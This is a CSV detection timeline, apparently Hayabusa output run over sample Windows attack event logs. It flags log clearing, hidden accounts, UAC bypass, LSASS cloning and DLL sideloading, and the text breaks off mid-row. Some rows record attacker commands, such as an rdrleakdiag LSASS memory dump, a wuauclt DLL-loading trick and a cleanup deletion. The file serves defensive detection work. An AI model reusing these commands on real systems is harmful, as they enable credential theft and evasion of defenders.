Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program 